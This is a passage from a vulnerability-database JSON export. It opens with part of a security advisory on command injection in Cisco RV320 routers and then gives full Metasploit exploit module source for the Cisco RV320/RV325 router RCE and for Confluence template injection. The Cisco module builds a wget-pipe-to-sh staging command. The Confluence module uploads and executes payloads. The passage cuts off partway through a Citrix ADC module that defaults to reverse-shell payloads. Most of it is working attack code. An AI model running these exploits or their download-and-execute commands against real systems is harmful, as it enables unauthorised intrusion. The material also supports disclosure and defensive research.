enables users to generate new X.509 \ncertificates directly on the device. A user may enter typical \nconfiguration parameters required for the certificate, such as \norganisation, the common name and so on. In order to generate the \ncertificate, the device uses the command-line program openssl [2]. The \ndevice's firmware uses the following format string to assemble the \nopenssl command: \n \n------------------------------------------------------------------------ \nopenssl req -new -nodes -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 -out %s%s.csr -days %s -newkey rsa:%s > /dev/null 2>&1 \n------------------------------------------------------------------------ \n \nAlthough the web interface filters certain special characters via \nJavaScript, there is actually no input filtering, escaping or encoding \nhappening on the server. This allows attackers to inject arbitrary \ncommands. \n \n \nProof of Concept \n================ \n \nEven though all components of the subject seem to be vulnerable to \ncommand injection, the following example uses the common name to trigger \na ping command: \n \n------------------------------------------------------------------------ \na'$(ping -c 4 192.168.1.2)'b \n------------------------------------------------------------------------ \n \nThe following HTTP POST request invokes the certificate generator \nfunction and triggers the command injection. It requires a valid session \ncookie for the device's web interface. \n \n------------------------------------------------------------------------ \ncurl -s -b \"$COOKIE\" \\ \n--data \"page=self_generator.htm&totalRules=1&OpenVPNRules=30\"\\ \n\"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A\"\\ \n\"&organization=A&organization_unit=A&email=ab%40example.com\"\\ \n\"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&\"\\ \n\"SelectSubject_s=1\" \\ \n--data-urlencode \"common_name=a'\\$(ping -c 4 192.168.1.2)'b\" \\ \n\"http://192.168.1.1/certificate_handle2.htm?type=4\" \n------------------------------------------------------------------------ \n \nAfterwards, the incoming ICMP echo requests can be observed on the \nattacker's system at 192.168.1.2. \n \n \nWorkaround \n========== \n \nPrevent untrusted users from using the router's web interface. \n \n \nFix \n=== \n \nInstall firmware version 1.4.2.20 (or later) on the router. \n \n \nSecurity Risk \n============= \n \nThe vulnerability allows attackers with administrative access to the \nrouter's web interface to execute arbitrary operating system commands on \nthe device. Because attackers require valid credentials to the web \ninterface, this vulnerability is only rated as a medium risk. \n \n \nTimeline \n======== \n \n2018-09-19 Vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-16 List of affected versions provided by vendor \n2019-01-23 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://wiki.openssl.org/index.php/Command_Line_Utilities \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGeschA$?ftsfA1/4hrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151313/rt-sa-2018-004.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2022-06-24T09:00:17", "description": "This exploit module combines an information disclosure (CVE-2019-1653) and a command injection vulnerability (CVE-2019-1652) together to gain unauthenticated remote code execution on Cisco RV320 and RV325 small business routers. Can be exploited via the WAN interface of the router. Either via HTTPS on port 443 or HTTP on port 8007 on some older firmware versions.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-02-25T14:51:05", "type": "metasploit", "title": "Cisco RV320 and RV325 Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-LINUX-HTTP-CISCO_RV32X_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::CmdStager\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Cisco RV320 and RV325 Unauthenticated Remote Code Execution\",\n 'Description' => %q{\n This exploit module combines an information disclosure (CVE-2019-1653)\n and a command injection vulnerability (CVE-2019-1652) together to gain\n unauthenticated remote code execution on Cisco RV320 and RV325 small business\n routers. Can be exploited via the WAN interface of the router. Either via HTTPS\n on port 443 or HTTP on port 8007 on some older firmware versions.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'RedTeam Pentesting GmbH', # Discovery, Metasploit\n 'Philip Huppert', # Discovery\n 'Benjamin Grap' # Metasploit\n ],\n 'References' => [\n [ 'CVE','2019-1653' ],\n [ 'CVE','2019-1652' ],\n [ 'EDB','46243' ],\n [ 'BID','106728' ],\n [ 'BID','106732' ],\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]\n ],\n 'Platform' => 'linux',\n 'Targets' =>\n [\n [ 'LINUX MIPS64',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPS64\n }\n ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\"\n },\n 'CmdStagerFlavor' => [ 'bourne' ],\n 'Privileged' => true,\n 'DisclosureDate' => '2018-09-09',\n 'DefaultTarget' => 0))\n\n register_options([\n Opt::RPORT(8007), # port of Cisco webinterface\n OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),\n OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),\n OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.\n ])\n deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.\n deregister_options('SSLCert') # not required since stager only uses HTTP.\n end\n\n def execute_command(cmd, opts = {})\n # use generated payload, we don't have to do anything here\n end\n\n def autofilter\n true\n end\n\n def on_request_uri(cli, req)\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\n @cmdstager = generate_cmdstager().join(';')\n send_response(cli, \"#{@cmdstager}\")\n end\n\n def primer\n payload_url = get_uri\n print_status(\"Downloading configuration from #{peer}\")\n if(datastore['USE_SSL'])\n print_status(\"Using SSL connection to router.\")\n end\n res = send_request_cgi({\n 'uri' => normalize_uri(\"cgi-bin\",\"config.exp\"),\n 'SSL' => datastore['USE_SSL']\n })\n unless res\n vprint_error('Connection failed.')\n return nil\n end\n\n unless res.code == 200\n vprint_error('Could not download config. Aborting.')\n return nil\n end\n\n print_status(\"Successfully downloaded config\")\n username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]\n pass = res.body.match(/^PASSWD=(\\h+)/)[1]\n authkey = \"1964300002\"\n print_status(\"Got MD5-Hash: #{pass}\")\n print_status(\"Loging in as user #{username} using password hash.\")\n print_status(\"Using default auth_key #{authkey}\")\n res2 = send_request_cgi({\n 'uri' => normalize_uri(\"cgi-bin\",\"userLogin.cgi\"),\n 'SSL' => datastore['USE_SSL'],\n 'method' => 'POST',\n 'data' => \"login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password=\"\n })\n\n unless res\n vprint_error('Connection failed during login. Aborting.')\n return nil\n end\n\n unless res.code == 200\n vprint_error('Login failed with downloaded credentials. Aborting.')\n return nil\n end\n\n #Extract authentication cookies\n cookies = res2.get_cookies()\n print_status(\"Successfully logged in as user #{username}.\")\n print_status(\"Got cookies: #{cookies}\")\n print_status(\"Sending payload. Staging via #{payload_url}.\")\n #Build staging command\n command_string = CGI::escape(\"'$(wget -q -O- #{payload_url}|sh)'\")\n if(command_string.length <= 63)\n print_status(\"Staging command length looks good. Sending exploit!\")\n else\n vprint_error(\"Warning: Staging command length probably too long. Trying anyway...\")\n end\n\n res3 = send_request_cgi({\n 'uri' => normalize_uri(\"certificate_handle2.htm\"),\n 'SSL' => datastore['USE_SSL'],\n 'method' => 'POST',\n 'cookie' => cookies,\n 'vars_get' => {\n 'type' => '4',\n },\n 'vars_post' => {\n 'page' => 'self_generator.htm',\n 'totalRules' => '1',\n 'OpenVPNRules' => '30',\n 'submitStatus' => '1',\n 'log_ch' => '1',\n 'type' => '4',\n 'Country' => 'A',\n 'state' => 'A',\n 'locality' => 'A',\n 'organization' => 'A',\n 'organization_unit' => 'A',\n 'email' => 'any@example.com',\n 'KeySize' => '512',\n 'KeyLength' => '1024',\n 'valid_days' => '30',\n 'SelectSubject_c' => '1',\n 'SelectSubject_s' => '1'\n },\n 'data' => \"common_name=#{command_string}\"\n })\n unless res3\n vprint_error('Connection failed while sending command. Aborting.')\n return nil\n end\n\n unless res3.code == 200\n vprint_error('Sending command not successful.')\n return nil\n end\n print_status(\"Sending payload timed out. Waiting for stager to connect...\")\n end\n\n def check\n #Check if device is vulnerable by downloading the config\n res = send_request_cgi({'uri'=>normalize_uri(\"cgi-bin\",\"config.exp\")})\n\n unless res\n vprint_error('Connection failed.')\n return CheckCode::Unknown\n end\n\n unless res.code == 200\n return CheckCode::Safe\n end\n\n unless res.body =~ /PASSWD/\n return CheckCode::Detected\n end\n\n CheckCode::Vulnerable\n end\n\n def exploit\n # Main function.\n # Setting delay for the Stager.\n Timeout.timeout(datastore['HTTPDELAY']) {super}\n rescue Timeout::Error\n print_status(\"Waiting for stager connection timed out. Try increasing the delay.\")\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/cisco_rv32x_rce.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T17:14:01", "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is unrequired to exploit this vulnerability. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. This vulnerability was originally discovered by Daniil Dmitriev https://twitter.com/ddv_ua.\n", "cvss3": {}, "published": "2019-04-11T12:55:51", "type": "metasploit", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2022-07-01T12:43:47", "id": "MSF:EXPLOIT-MULTI-HTTP-CONFLUENCE_WIDGET_CONNECTOR-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::FtpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Widget Connector Macro Velocity Template Injection',\n 'Description' => %q{\n Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\n allows embed online videos, slideshows, photostreams and more directly into page.\n A _template parameter can be used to inject remote Java code into a Velocity template,\n and gain code execution. Authentication is unrequired to exploit this vulnerability.\n By default, Java payload will be used because it is cross-platform, but you can also\n specify which native payload you want (Linux or Windows).\n\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n This vulnerability was originally discovered by Daniil Dmitriev\n https://twitter.com/ddv_ua.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Daniil Dmitriev', # Discovering vulnerability\n 'Dmitry (rrock) Shchannikov' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2019-3396' ],\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\n [ 'URL', 'https://paper.seebug.org/886/']\n ],\n 'Targets' => [\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 8090,\n 'SRVPORT' => 8021\n },\n 'Privileged' => false,\n 'DisclosureDate' => '2019-03-25',\n 'DefaultTarget' => 0,\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [true, 'Callback address for template loading']),\n OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),\n OptString.new('TRIGGERURL', [\n true, 'Url to external video service to trigger vulnerability',\n 'https://www.youtube.com/watch?v=kxopViU98Xo'\n ])\n ]\n )\n end\n\n # Handles ftp RETP command.\n #\n # @param ccs [Socket] Control connection socket.\n # @param arg [String] RETR argument.\n # @return [void]\n def on_client_command_retr(ccs, arg)\n vprint_status(\"FTP download request for #{arg}\")\n conn = establish_data_connection(ccs)\n if !conn\n ccs.put(\"425 Can't build data connection\\r\\n\")\n return\n end\n\n ccs.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\n case arg\n when /check\\.vm$/\n conn.put(wrap(get_check_vm))\n when /javaprop\\.vm$/\n conn.put(wrap(get_javaprop_vm))\n when /upload\\.vm$/\n conn.put(wrap(get_upload_vm))\n when /exec\\.vm$/\n conn.put(wrap(get_exec_vm))\n else\n conn.put(wrap(get_dummy_vm))\n end\n ccs.put(\"226 Transfer complete.\\r\\n\")\n conn.close\n end\n\n # Handles ftp PASS command to suppress output.\n #\n # @param ccs [Socket] Control connection socket.\n # @param arg [String] PASS argument.\n # @return [void]\n def on_client_command_pass(ccs, arg)\n @state[ccs][:pass] = arg\n vprint_status(\"#{@state[ccs][:name]} LOGIN #{@state[ccs][:user]} / #{@state[ccs][:pass]}\")\n ccs.put \"230 Login OK\\r\\n\"\n end\n\n # Handles ftp EPSV command to suppress output.\n #\n # @param ccs [Socket] Control connection socket.\n # @param arg [String] EPSV argument.\n # @return [void]\n def on_client_command_epsv(ccs, arg)\n vprint_status(\"#{@state[ccs][:name]} UNKNOWN 'EPSV #{arg}'\")\n ccs.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\n end\n\n # Returns a upload template.\n #\n # @return [String]\n def get_upload_vm\n <<~EOF\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\n EOF\n end\n\n # Returns a command execution template.\n #\n # @return [String]\n def get_exec_vm\n <<~EOF\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\n EOF\n end\n\n # Returns checking template.\n #\n # @return [String]\n def get_check_vm\n <<~EOF\n #{@check_text}\n EOF\n end\n\n # Returns Java's getting property template.\n #\n # @return [String]\n def get_javaprop_vm\n <<~EOF\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\n EOF\n end\n\n # Returns dummy template.\n #\n # @return [String]\n def get_dummy_vm\n <<~EOF\n EOF\n end\n\n # Checks the vulnerability.\n #\n # @return [Array] Check code\n def check\n checkcode = Exploit::CheckCode::Safe\n begin\n # Start the FTP service\n print_status('Starting the FTP server.')\n start_service\n\n @check_text = Rex::Text.rand_text_alpha(5..10)\n res = inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\n if res && res.body && res.body.include?(@check_text)\n checkcode = Exploit::CheckCode::Vulnerable\n end\n rescue Msf::Exploit::Failed => e\n vprint_error(e.message)\n checkcode = Exploit::CheckCode::Unknown\n end\n checkcode\n end\n\n # Injects Java code to the template.\n #\n # @param service_url [String] Address of template to injection.\n # @return [void]\n def inject_template(service_url, timeout = 20)\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'headers' => {\n 'Accept' => '*/*',\n 'Origin' => full_uri(vhost_uri: true)\n },\n 'ctype' => 'application/json; charset=UTF-8',\n 'data' => {\n 'contentId' => '1',\n 'macro' => {\n 'name' => 'widget',\n 'body' => '',\n 'params' => {\n 'url' => datastore['TRIGGERURL'],\n '_template' => service_url\n }\n\n }\n }.to_json\n }, timeout)\n\n unless res\n unless service_url.include?('exec.vm')\n print_warning('Connection timed out in #inject_template')\n end\n return\n end\n\n if res.body.include? 'widget-error'\n print_error('Failed to inject and execute code:')\n else\n vprint_status('Server response:')\n end\n\n vprint_line(res.body)\n\n res\n end\n\n # Returns a system property for Java.\n #\n # @param prop [String] Name of the property to retrieve.\n # @return [Array] Array consisting of a result code (Integer) and, if the property could be obtained, the property (String).\n def get_java_property(prop)\n @prop = prop\n res = inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\n if res && res.body\n if res.body.empty?\n return [2]\n else\n prop_to_return = clear_response(res.body)\n if prop_to_return.blank?\n return [2]\n else\n return [0, prop_to_return]\n end\n end\n end\n [1]\n end\n\n # Returns the target platform.\n #\n # @return [String]\n def get_target_platform\n return get_java_property('os.name')\n end\n\n # Checks if the target os/platform is compatible with the module target or not.\n #\n # @return [TrueClass] Compatible\n # @return [FalseClass] Not compatible\n def target_platform_compat?(target_platform)\n target.platform.names.each do |n|\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\n return true\n end\n end\n\n false\n end\n\n # Returns a temp path from the remote target.\n #\n # @return [String]\n def get_tmp_path\n return get_java_property('java.io.tmpdir')\n end\n\n # Returns the Java home path used by Confluence.\n #\n # @return [String]\n def get_java_home_path\n return get_java_property('java.home')\n end\n\n # Returns Java code that can be used to inject to the template in order to copy a file.\n #\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\n # It is meant to be used with #get_write_file_code.\n #\n # @param fname [String] The file to copy\n # @param new_fname [String] The new file\n # @return [void]\n def get_dup_file_code(fname, new_fname)\n if fname =~ %r{^/[[:print:]]+}\n @command = \"cp #{fname} #{new_fname}\"\n else\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\n end\n\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n end\n\n # Returns the normalized file path for payload.\n #\n # @return [String]\n def normalize_payload_fname(tmp_path, fname)\n # A quick way to check platform instead of actually grabbing os.name in Java system properties.\n if tmp_path =~ %r{^/[[:print:]]+}\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\n else\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\n end\n end\n\n # Exploits the target in Java platform.\n #\n # @return [void]\n def exploit_as_java\n res_code, tmp_path = get_tmp_path\n\n unless res_code == 0\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\n @command = ''\n\n res_code, java_home = get_java_home_path\n\n if res_code == 0\n vprint_status(\"Found Java home path: #{java_home}\")\n else\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\n end\n\n register_files_for_cleanup(@fname)\n\n if @fname =~ %r{^/[[:print:]]+}\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\n @command = %(#{normalized_java_path} -jar #{@fname})\n else\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n @command = %(cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname})\n end\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to execute #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", 5)\n end\n\n # Exploits the target in Windows platform.\n #\n # @return [void]\n def exploit_as_windows\n res_code, tmp_path = get_tmp_path\n\n unless res_code == 0\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.exe\")\n new_fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.exe\")\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", 5)\n end\n\n # Exploits the target in Linux platform.\n #\n # @return [void]\n def exploit_as_linux\n res_code, tmp_path = get_tmp_path\n\n unless res_code == 0\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n @command = \"chmod +x #{@fname}\"\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", 5)\n end\n\n def exploit\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\n\n # Start the FTP service\n print_status('Starting the FTP server.')\n start_service\n\n res_code, target_platform = get_target_platform\n case res_code\n when 0\n print_status(\"Target being detected as: #{target_platform}\")\n when 1\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\n when 2\n fail_with(Failure::NoTarget, 'Failed to obtain the target OS.')\n end\n\n unless target_platform_compat?(target_platform)\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\n end\n\n case target.name.downcase\n when /java$/\n exploit_as_java\n when /windows$/\n exploit_as_windows\n when /linux$/\n exploit_as_linux\n end\n end\n\n # Wraps request.\n #\n # @return [String]\n def wrap(string)\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\n end\n\n # Returns unwrapped response.\n #\n # @return [String, nil]\n def clear_response(string)\n string.scan(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)&.flatten&.first\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/confluence_widget_connector.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T08:41:59", "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n", "cvss3": {}, "published": "2021-04-16T00:13:25", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-16T00:13:25", "id": "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/freebsd/http/citrix_dir_traversal_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::FileDropper\n include Msf::Module::Deprecated\n\n moved_from 'exploit/linux/http/citrix_dir_traversal_rce'\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',\n 'Description' => %q{\n This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'Project Zero India', # PoC used by this module\n 'TrustedSec', # PoC used by this module\n 'James Brytan', # PoC contributed independently\n 'James Smith', # PoC contributed independently\n 'Marisa Mack', # PoC contributed independently\n 'Rob Vinson', # PoC contributed independently\n 'Sergey Pashevkin', # PoC contributed independently\n 'Steven Laura', # PoC contributed independently\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (https://www.pirates.re/)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['EDB', '47901'],\n ['EDB', '47902'],\n ['URL', 'https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\n ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => false,\n 'Targets' => [\n ['Python',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :python,\n 'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}\n ],\n ['Unix Command',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',\n 'HttpClientTimeout' => 3.5\n },\n 'Notes' => {\n 'AKA' => ['Shitrix'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def exploit\n print_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n 